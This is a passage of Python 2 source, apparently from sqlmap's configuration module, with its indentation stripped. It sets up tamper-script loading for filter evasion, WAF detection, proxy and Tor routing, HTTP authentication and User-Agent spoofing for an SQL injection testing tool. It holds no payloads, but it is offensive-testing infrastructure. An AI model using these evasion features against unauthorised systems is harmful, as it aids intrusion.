regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I)
if regex:
conf.dbms = regex.group(1)
Backend.setVersion(regex.group(2))
if conf.dbms not in SUPPORTED_DBMS:
errMsg = "you provided an unsupported back-end database management "
errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
errMsg += "If you do not know the back-end DBMS, do not provide "
errMsg += "it and sqlmap will fingerprint it for you."
raise SqlmapUnsupportedDBMSException(errMsg)
for dbms, aliases in DBMS_ALIASES:
if conf.dbms in aliases:
conf.dbms = dbms
break
def _setTamperingFunctions():
"""
Loads tampering functions from given script(s)
"""
if conf.tamper:
last_priority = PRIORITY.HIGHEST
check_priority = True
resolve_priorities = False
priorities = []
for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
found = False
path = paths.SQLMAP_TAMPER_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
try:
if not script:
continue
elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)):
script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script)
elif not os.path.exists(script):
errMsg = "tamper script '%s' does not exist" % script
raise SqlmapFilePathException(errMsg)
elif not script.endswith(".py"):
errMsg = "tamper script '%s' should have an extension '.py'" % script
raise SqlmapSyntaxException(errMsg)
except UnicodeDecodeError:
errMsg = "invalid character provided in option '--tamper'"
raise SqlmapSyntaxException(errMsg)
dirname, filename = os.path.split(script)
dirname = os.path.abspath(dirname)
infoMsg = "loading tamper script '%s'" % filename[:-3]
logger.info(infoMsg)
if not os.path.exists(os.path.join(dirname, "__init__.py")):
errMsg = "make sure that there is an empty file '__init__.py' "
errMsg += "inside of tamper scripts directory '%s'" % dirname
raise SqlmapGenericException(errMsg)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
except (ImportError, SyntaxError), ex:
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
found = True
kb.tamperFunctions.append(function)
function.func_name = module.__name__
if check_priority and priority > last_priority:
message = "it appears that you might have mixed "
message += "the order of tamper scripts. "
message += "Do you want to auto resolve this? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'N':
resolve_priorities = False
elif choice == 'Q':
raise SqlmapUserQuitException
else:
resolve_priorities = True
check_priority = False
priorities.append((priority, function))
last_priority = priority
break
elif name == "dependencies":
function()
if not found:
errMsg = "missing function 'tamper(payload, **kwargs)' "
errMsg += "in tamper script '%s'" % script
raise SqlmapGenericException(errMsg)
if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
warnMsg = "using too many tamper scripts is usually not "
warnMsg += "a good idea"
logger.warning(warnMsg)
if resolve_priorities and priorities:
priorities.sort(reverse=True)
kb.tamperFunctions = []
for _, function in priorities:
kb.tamperFunctions.append(function)
def _setWafFunctions():
"""
Loads WAF/IPS/IDS detecting functions from script(s)
"""
if conf.identifyWaf:
for found in glob.glob(os.path.join(paths.SQLMAP_WAF_PATH, "*.py")):
dirname, filename = os.path.split(found)
dirname = os.path.abspath(dirname)
if filename == "__init__.py":
continue
debugMsg = "loading WAF script '%s'" % filename[:-3]
logger.debug(debugMsg)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
if filename[:-3] in sys.modules:
del sys.modules[filename[:-3]]
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
except ImportError, msg:
raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))
_ = dict(inspect.getmembers(module))
if "detect" not in _:
errMsg = "missing function 'detect(get_page)' "
errMsg += "in WAF script '%s'" % found
raise SqlmapGenericException(errMsg)
else:
kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3])))
kb.wafFunctions = sorted(kb.wafFunctions, key=lambda _: "generic" in _[1].lower())
def _setThreads():
if not isinstance(conf.threads, int) or conf.threads <= 0:
conf.threads = 1
def _setDNSCache():
"""
Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests.
"""
def _getaddrinfo(*args, **kwargs):
if args in kb.cache.addrinfo:
return kb.cache.addrinfo[args]
else:
kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache.addrinfo[args]
if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo
socket.getaddrinfo = _getaddrinfo
def _setSocketPreConnect():
"""
Makes a pre-connect version of socket.connect
"""
if conf.disablePrecon:
return
def _():
while kb.get("threadContinue") and not conf.get("disablePrecon"):
try:
for key in socket._ready:
if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE:
family, type, proto, address = key
s = socket.socket(family, type, proto)
s._connect(address)
with kb.locks.socket:
socket._ready[key].append((s._sock, time.time()))
except KeyboardInterrupt:
break
except:
pass
finally:
time.sleep(0.01)
def connect(self, address):
found = False
key = (self.family, self.type, self.proto, address)
with kb.locks.socket:
if key not in socket._ready:
socket._ready[key] = []
while len(socket._ready[key]) > 0:
candidate, created = socket._ready[key].pop(0)
if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:
self._sock = candidate
found = True
break
else:
try:
candidate.close()
except socket.error:
pass
if not found:
self._connect(address)
if not hasattr(socket.socket, "_connect"):
socket._ready = {}
socket.socket._connect = socket.socket.connect
socket.socket.connect = connect
thread = threading.Thread(target=_)
setDaemon(thread)
thread.start()
def _setHTTPHandlers():
"""
Check and set the HTTP/SOCKS proxy for all HTTP requests.
"""
global proxyHandler
for _ in ("http", "https"):
if hasattr(proxyHandler, "%s_open" % _):
delattr(proxyHandler, "%s_open" % _)
if conf.proxyList is not None:
if not conf.proxyList:
errMsg = "list of usable proxies is exhausted"
raise SqlmapNoneDataException(errMsg)
conf.proxy = conf.proxyList[0]
conf.proxyList = conf.proxyList[1:]
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
logger.info(infoMsg)
elif not conf.proxy:
if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy:
proxyHandler.proxies = {}
if conf.proxy:
debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
logger.debug(debugMsg)
try:
_ = urlparse.urlsplit(conf.proxy)
except Exception, ex:
errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex))
raise SqlmapSyntaxException, errMsg
hostnamePort = _.netloc.split(":")
scheme = _.scheme.upper()
hostname = hostnamePort[0]
port = None
username = None
password = None
if len(hostnamePort) == 2:
try:
port = int(hostnamePort[1])
except:
pass # drops into the next check block
if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):
errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE))
raise SqlmapSyntaxException(errMsg)
if conf.proxyCred:
_ = re.search("^(.*?):(.*?)$", conf.proxyCred)
if not _:
errMsg = "proxy authentication credentials "
errMsg += "value must be in format username:password"
raise SqlmapSyntaxException(errMsg)
else:
username = _.group(1)
password = _.group(2)
if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5):
proxyHandler.proxies = {}
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password)
socks.wrapmodule(urllib2)
else:
socks.unwrapmodule(urllib2)
if conf.proxyCred:
# Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection
proxyString = "%s@" % conf.proxyCred
else:
proxyString = ""
proxyString += "%s:%d" % (hostname, port)
proxyHandler.proxies = {"http": proxyString, "https": proxyString}
proxyHandler.__init__(proxyHandler.proxies)
debugMsg = "creating HTTP requests opener object"
logger.debug(debugMsg)
handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
if not conf.dropSetCookie:
if not conf.loadCookies:
conf.cj = cookielib.CookieJar()
else:
conf.cj = cookielib.MozillaCookieJar()
resetCookieJar(conf.cj)
handlers.append(urllib2.HTTPCookieProcessor(conf.cj))
# Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html
if conf.keepAlive:
warnMsg = "persistent HTTP(s) connections, Keep-Alive, has "
warnMsg += "been disabled because of its incompatibility "
if conf.proxy:
warnMsg += "with HTTP(s) proxy"
logger.warn(warnMsg)
elif conf.authType:
warnMsg += "with authentication methods"
logger.warn(warnMsg)
else:
handlers.append(keepAliveHandler)
opener = urllib2.build_opener(*handlers)
urllib2.install_opener(opener)
def _setSafeVisit():
"""
Check and set the safe visit options.
"""
if not any((conf.safeUrl, conf.safeReqFile)):
return
if conf.safeReqFile:
checkFile(conf.safeReqFile)
raw = readCachedFileContent(conf.safeReqFile)
match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])
if match:
kb.safeReq.method = match.group(1)
kb.safeReq.url = match.group(2)
kb.safeReq.headers = {}
for line in raw[raw.find('\n') + 1:].split('\n'):
line = line.strip()
if line and ':' in line:
key, value = line.split(':', 1)
value = value.strip()
kb.safeReq.headers[key] = value
if key == HTTP_HEADER.HOST:
if not value.startswith("http"):
scheme = "http"
if value.endswith(":443"):
scheme = "https"
value = "%s://%s" % (scheme, value)
kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
else:
break
post = None
if '\r\n\r\n' in raw:
post = raw[raw.find('\r\n\r\n') + 4:]
elif '\n\n' in raw:
post = raw[raw.find('\n\n') + 2:]
if post and post.strip():
kb.safeReq.post = post
else:
kb.safeReq.post = None
else:
errMsg = "invalid format of a safe request file"
raise SqlmapSyntaxException, errMsg
else:
if not re.search("^http[s]*://", conf.safeUrl):
if ":443/" in conf.safeUrl:
conf.safeUrl = "https://" + conf.safeUrl
else:
conf.safeUrl = "http://" + conf.safeUrl
if conf.safeFreq <= 0:
errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
raise SqlmapSyntaxException(errMsg)
def _setPrefixSuffix():
if conf.prefix is not None and conf.suffix is not None:
# Create a custom boundary object for user's supplied prefix
# and suffix
boundary = AttribDict()
boundary.level = 1
boundary.clause = [0]
boundary.where = [1, 2, 3]
boundary.prefix = conf.prefix
boundary.suffix = conf.suffix
if " like" in boundary.suffix.lower():
if "'" in boundary.suffix.lower():
boundary.ptype = 3
elif '"' in boundary.suffix.lower():
boundary.ptype = 5
elif "'" in boundary.suffix:
boundary.ptype = 2
elif '"' in boundary.suffix:
boundary.ptype = 4
else:
boundary.ptype = 1
# user who provides --prefix/--suffix does not want other boundaries
# to be tested for
conf.boundaries = [boundary]
def _setAuthCred():
"""
Adds authentication credentials (if any) for current target to the password manager
(used by connection handler)
"""
if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)):
kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword)
def _setHTTPAuthentication():
"""
Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or PKI),
username and password for first three methods, or PEM private key file for
PKI authentication
"""
global authHandler
if not conf.authType and not conf.authCred and not conf.authFile:
return
if conf.authFile and not conf.authType:
conf.authType = AUTH_TYPE.PKI
elif conf.authType and not conf.authCred and not conf.authFile:
errMsg = "you specified the HTTP authentication type, but "
errMsg += "did not provide the credentials"
raise SqlmapSyntaxException(errMsg)
elif not conf.authType and conf.authCred:
errMsg = "you specified the HTTP authentication credentials, "
errMsg += "but did not provide the type"
raise SqlmapSyntaxException(errMsg)
elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
errMsg = "HTTP authentication type value must be "
errMsg += "Basic, Digest, NTLM or PKI"
raise SqlmapSyntaxException(errMsg)
if not conf.authFile:
debugMsg = "setting the HTTP authentication type and credentials"
logger.debug(debugMsg)
authType = conf.authType.lower()
if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST):
regExp = "^(.*?):(.*?)$"
errMsg = "HTTP %s authentication credentials " % authType
errMsg += "value must be in format 'username:password'"
elif authType == AUTH_TYPE.NTLM:
regExp = "^(.*\\\\.*):(.*?)$"
errMsg = "HTTP NTLM authentication credentials value must "
errMsg += "be in format 'DOMAIN\username:password'"
elif authType == AUTH_TYPE.PKI:
errMsg = "HTTP PKI authentication require "
errMsg += "usage of option `--auth-pki`"
raise SqlmapSyntaxException(errMsg)
aCredRegExp = re.search(regExp, conf.authCred)
if not aCredRegExp:
raise SqlmapSyntaxException(errMsg)
conf.authUsername = aCredRegExp.group(1)
conf.authPassword = aCredRegExp.group(2)
kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
_setAuthCred()
if authType == AUTH_TYPE.BASIC:
authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr)
elif authType == AUTH_TYPE.DIGEST:
authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr)
elif authType == AUTH_TYPE.NTLM:
try:
from ntlm import HTTPNtlmAuthHandler
except ImportError:
errMsg = "sqlmap requires Python NTLM third-party library "
errMsg += "in order to authenticate via NTLM, "
errMsg += "http://code.google.com/p/python-ntlm/"
raise SqlmapMissingDependence(errMsg)
authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
else:
debugMsg = "setting the HTTP(s) authentication PEM private key"
logger.debug(debugMsg)
_ = safeExpandUser(conf.authFile)
checkFile(_)
authHandler = HTTPSPKIAuthHandler(_)
def _setHTTPExtraHeaders():
if conf.headers:
debugMsg = "setting extra HTTP headers"
logger.debug(debugMsg)
conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
for headerValue in conf.headers:
if not headerValue.strip():
continue
if headerValue.count(':') >= 1:
header, value = (_.lstrip() for _ in headerValue.split(":", 1))
if header and value:
conf.httpHeaders.append((header, value))
else:
errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u')
raise SqlmapSyntaxException(errMsg)
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
if conf.charset:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
# Invalidating any caching mechanism in between
# Reference: http://stackoverflow.com/a/1383359
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))
def _defaultHTTPUserAgent():
"""
@return: default sqlmap HTTP User-Agent header
@rtype: C{str}
"""
return "%s (%s)" % (VERSION_STRING, SITE)
def _setHTTPUserAgent():
"""
Set the HTTP User-Agent header.
Depending on the user options it can be:
* The default sqlmap string
* A default value read as user option
* A random value read from a list of User-Agent headers from a
file choosed as user option
"""
if conf.mobile:
message = "which smartphone do you want sqlmap to imitate "
message += "through HTTP User-Agent header?\n"
items = sorted(getPublicTypeMembers(MOBILES, True))
for count in xrange(len(items)):
item = items[count]
message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "")
test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1)
try:
item = items[int(test) - 1]
except:
item = MOBILES.IPHONE
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1]))
elif conf.agent:
debugMsg = "setting the HTTP User-Agent header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent))
elif not conf.randomAgent:
_ = True
for header, _ in conf.httpHeaders:
if header == HTTP_HEADER.USER_AGENT:
_ = False
break
if _:
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent()))
else:
if not kb.userAgents:
debugMsg = "loading random HTTP User-Agent header(s) from "
debugMsg += "file '%s'" % paths.USER_AGENTS
logger.debug(debugMsg)
try:
kb.userAgents = getFileItems(paths.USER_AGENTS)
except IOError:
warnMsg = "unable to read HTTP User-Agent header "
warnMsg += "file '%s'" % paths.USER_AGENTS
logger.warn(warnMsg)
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent()))
return
userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0]
infoMsg = "fetched random HTTP User-Agent header from "
infoMsg += "file '%s': '%s'" % (paths.USER_AGENTS, userAgent)
logger.info(infoMsg)
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))
def _setHTTPReferer():
"""
Set the HTTP Referer
"""
if conf.referer:
debugMsg = "setting the HTTP Referer header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
def _setHTTPHost():
"""
Set the HTTP Host
"""
if conf.host:
debugMsg = "setting the HTTP Host header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""
if conf.cookie:
debugMsg = "setting the HTTP Cookie header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie))
def _setHTTPTimeout():
"""
Set the HTTP timeout
"""
if conf.timeout:
debugMsg = "setting the HTTP timeout"
logger.debug(debugMsg)
conf.timeout = float(conf.timeout)
if conf.timeout < 3.0:
warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap "
warnMsg += "will going to reset it"
logger.warn(warnMsg)
conf.timeout = 3.0
else:
conf.timeout = 30.0
socket.setdefaulttimeout(conf.timeout)
def _checkDependencies():
"""
Checks for missing dependencies.
"""
if conf.dependencies:
checkDependencies()
def _createTemporaryDirectory():
"""
Creates temporary directory for this run.
"""
if conf.tmpDir:
try:
if not os.path.isdir(conf.tmpDir):
os.makedirs(conf.tmpDir)
_ = os.path.join(conf.tmpDir, randomStr())
open(_, "w+b").close()
os.remove(_)
tempfile.tempdir = conf.tmpDir
warnMsg = "using '%s' as the temporary directory" % conf.tmpDir
logger.warn(warnMsg)
except (OSError, IOError), ex:
errMsg = "there has been a problem while accessing "
errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
raise SqlmapSystemException, errMsg
else:
try:
if not os.path.isdir(tempfile.gettempdir()):
os.makedirs(tempfile.gettempdir())
except (OSError, IOError, WindowsError), ex:
warnMsg = "there has been a problem while accessing "
warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
warnMsg += "make sure that there is enough disk space left. If problem persists, "
warnMsg += "try to set environment variable 'TEMP' to a location "
warnMsg += "writeable by the current user"
logger.warn(warnMsg)
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
try:
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
except (OSError, IOError, WindowsError):
tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
kb.tempDir = tempfile.tempdir
if not os.path.isdir(tempfile.tempdir):
try:
os.makedirs(tempfile.tempdir)
except (OSError, IOError, WindowsError), ex:
errMsg = "there has been a problem while setting "
errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
raise SqlmapSystemException, errMsg
def _cleanupOptions():
"""
Cleanup configuration attributes.
"""
debugMsg = "cleaning up configuration parameters"
logger.debug(debugMsg)
width = getConsoleWidth()
if conf.eta:
conf.progressWidth = width - 26
else:
conf.progressWidth = width - 46
for key, value in conf.items():
if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")):
conf[key] = safeExpandUser(value)
if conf.testParameter:
conf.testParameter = urldecode(conf.testParameter)
conf.testParameter = conf.testParameter.replace(" ", "")
conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)
else:
conf.testParameter = []
if conf.agent:
conf.agent = re.sub(r"[\r\n]", "", conf.agent)
if conf.user:
conf.user = conf.user.replace(" ", "")
if conf.rParam:
conf.rParam = conf.rParam.replace(" ", "")
conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam)
else:
conf.rParam = []
if conf.paramDel and '\\' in conf.paramDel:
conf.paramDel = conf.paramDel.decode("string_escape")
if conf.skip:
conf.skip = conf.skip.replace(" ", "")
conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip)
else:
conf.skip = []
if conf.cookie:
conf.cookie = re.sub(r"[\r\n]", "", conf.cookie)
if conf.delay:
conf.delay = float(conf.delay)
if conf.rFile:
conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile))
if conf.wFile:
conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile))
if conf.dFile:
conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile))
if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"):
conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl)
if conf.msfPath:
conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath))
if conf.tmpPath:
conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath))
if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.forms, conf.crawlDepth)):
conf.multipleTargets = True
if conf.optimize:
setOptimize()
if conf.data:
conf.data = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data)
if conf.url:
conf.url = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url)
if conf.os:
conf.os = conf.os.capitalize()
if conf.dbms:
conf.dbms = conf.dbms.capitalize()
if conf.testFilter:
conf.testFilter = conf.testFilter.strip('*+')
conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
try:
re.compile(conf.testFilter)
except re.error:
conf.testFilter = re.escape(conf.testFilter)
if conf.testSkip:
conf.testSkip = conf.testSkip.strip('*+')
conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
try:
re.compile(conf.testSkip)
except re.error:
conf.testSkip = re.escape(conf.testSkip)
if "timeSec" not in kb.explicitSettings:
if conf.tor:
conf.timeSec = 2 * conf.timeSec
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
warnMsg = "increasing default value for "
warnMsg += "option '--time-sec' to %d because " % conf.timeSec
warnMsg += "switch '--tor' was provided"
logger.warn(warnMsg)
else:
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
if conf.retries:
conf.retries = min(conf.retries, MAX_CONNECT_RETRIES)
if conf.code:
conf.code = int(conf.code)
if conf.csvDel:
conf.csvDel = conf.csvDel.decode("string_escape") # e.g. '\\t' -> '\t'
if conf.torPort and isinstance(conf.torPort, basestring) and conf.torPort.isdigit():
conf.torPort = int(conf.torPort)
if conf.torType:
conf.torType = conf.torType.upper()
if conf.outputDir:
paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir))
setPaths(paths.SQLMAP_ROOT_PATH)
if conf.string:
try:
conf.string = conf.string.decode("unicode_escape")
except:
charset = string.whitespace.replace(" ", "")
for _ in charset:
conf.string = conf.string.replace(_.encode("string_escape"), _)
if conf.getAll:
map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)
if conf.noCast:
for _ in DUMP_REPLACEMENTS.keys():
del DUMP_REPLACEMENTS[_]
if conf.dumpFormat:
conf.dumpFormat = conf.dumpFormat.upper()
if conf.torType:
conf.torType = conf.torType.upper()
if conf.col:
conf.col = re.sub(r"\s*,\s*", ',', conf.col)
if conf.excludeCol:
conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol)
if conf.binaryFields:
conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)
if any((conf.proxy, conf.proxyFile, conf.tor)):
conf.disablePrecon = True
threadData = getCurrentThreadData()
threadData.reset()
def _cleanupEnvironment():
"""
Cleanup environment (e.g. from leftovers after --sqlmap-shell).
"""
if issubclass(urllib2.socket.socket, socks.socksocket):
socks.unwrapmodule(urllib2)
if hasattr(socket, "_ready"):
socket._ready.clear()
def _dirtyPatches():
"""
Place for "dirty" Python related patches
"""
httplib._MAXLINE = 1 * 1024 * 1024 # accept overly long result lines (e.g. SQLi results in HTTP header responses)
if IS_WIN:
from thirdparty.wininetpton import win_inet_pton # add support for inet_pton() on Windows OS
def _purgeOutput():
"""
Safely removes (purges) output directory.
"""
if conf.purgeOutput:
purge(paths.SQLMAP_OUTPUT_PATH)
def _setConfAttributes():
"""
This function set some needed attributes into the configuration
singleton.
"""
debugMsg = "initializing the configuration"
logger.debug(debugMsg)
conf.authUsername = None
conf.authPassword = None
conf.boundaries = []
conf.cj = None
conf.dbmsConnector = None
conf.dbmsHandler = None
conf.dnsServer = None
conf.dumpPath = None
conf.hashDB = None
conf.hashDBFile = None
conf.httpHeaders = []
conf.hostname = None
conf.ipv6 = False
conf.multipleTargets = False
conf.outputPath = None
conf.paramDict = {}
conf.parameters = {}
conf.path = None
conf.port = None
conf.proxyList = None
conf.resultsFilename = None
conf.resultsFP = None
conf.scheme = None
conf.tests = []
conf.trafficFP = None
conf.wFileType = None
def _setKnowledgeBaseAttributes(flushAll=True):
"""
This function set some needed attributes into the knowledge base
singleton.
"""
debugMsg = "initializing the knowledge base"
logger.debug(debugMsg)
kb.absFilePaths = set()
kb.adjustTimeDelay = None
kb.alerted = False
kb.alwaysRefresh = None
kb.arch = None
kb.authHeader = None
kb.bannerFp = AttribDict()
kb.binaryField = False
kb.browserVerification = None
kb.brute = AttribDict({"tables": [], "columns": []})
kb.bruteMode = False
kb.cache = AttribDict()
kb.cache.addrinfo = {}
kb.cache.content = {}
kb.cache.encoding = {}
kb.cache.intBoundaries = None
kb.cache.parsedDbms = {}
kb.cache.regex = {}
kb.cache.stdev = {}
kb.captchaDetected = None
kb.chars = AttribDict()
kb.chars.delimiter = randomStr(length=6, lowercase=True)
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
kb.columnExistsChoice = None
kb.commonOutputs = None
kb.connErrorChoice = None
kb.connErrorCounter = 0
kb.cookieEncodeChoice = None
kb.counters = {}
kb.data = AttribDict()
kb.dataOutputFlag = False
# Active back-end DBMS fingerprint
kb.dbms = None
kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
kb.dep = None
kb.dnsMode = False
kb.dnsTest = None
kb.docRoot = None
kb.droppingRequests = False
kb.dumpColumns = None
kb.dumpTable = None
kb.dumpKeyboardInterrupt = False
kb.dynamicMarkings = []
kb.dynamicParameter = False
kb.endDetection = False
kb.explicitSettings = set()
kb.extendTests = None
kb.errorChunkLength = None
kb.errorIsNone = True
kb.falsePositives = []
kb.fileReadMode = False
kb.followSitemapRecursion = None
kb.forcedDbms = None
kb.forcePartialUnion = False
kb.forceWhere = None
kb.futileUnion = None
kb.headersFp = {}
kb.heuristicDbms = None
kb.heuristicExtendedDbms = None
kb.heuristicMode = False
kb.heuristicPage = False
kb.heuristicTest = None
kb.hintValue = None
kb.htmlFp = []
kb.httpErrorCodes = {}
kb.inferenceMode = False
kb.ignoreCasted = None
kb.ignoreNotFound = False
kb.ignoreTimeout = False
kb.injection = InjectionDict()
kb.injections = []
kb.laggingChecked = False
kb.lastParserStatus = None
kb.locks = AttribDict()
for _ in ("cache", "connError", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"):
kb.locks[_] = threading.Lock()
kb.matchRatio = None
kb.maxConnectionsFlag = False
kb.mergeCookies = None
kb.multiThreadMode = False
kb.negativeLogic = False
kb.nullConnection = None
kb.oldMsf = None
kb.orderByColumns = None
kb.originalCode = None
kb.originalPage = None
kb.originalPageTime = None
kb.originalTimeDelay = None
kb.originalUrls = dict()
# Back-end DBMS underlying operating system fingerprint via banner (-b)
# parsing
kb.os = None
kb.osVersion = None
kb.osSP = None
kb.pageCompress = True
kb.pageTemplate = None
kb.pageTemplates = dict()
kb.pageEncoding = DEFAULT_PAGE_ENCODING
kb.pageStable = None
kb.partRun = None
kb.permissionFlag = False
kb.postHint = None
kb.postSpaceToPlus = False
kb.postUrlEncode = True
kb.prependFlag = False
kb.processResponseCounter = 0
kb.previousMethod = None
kb.processUserMarks = None
kb.proxyAuthHeader = None
kb.queryCounter = 0
kb.redirectChoice = None
kb.reflectiveMechanism = True
kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0}
kb.requestCounter = 0
kb.resendPostOnRedirect = None
kb.resolutionDbms = None
kb.responseTimes = {}
kb.responseTimeMode = None
kb.responseTimePayload = None
kb.resumeValues = True
kb.rowXmlMode = False
kb.safeCharEncode = False
kb.safeReq = AttribDict()
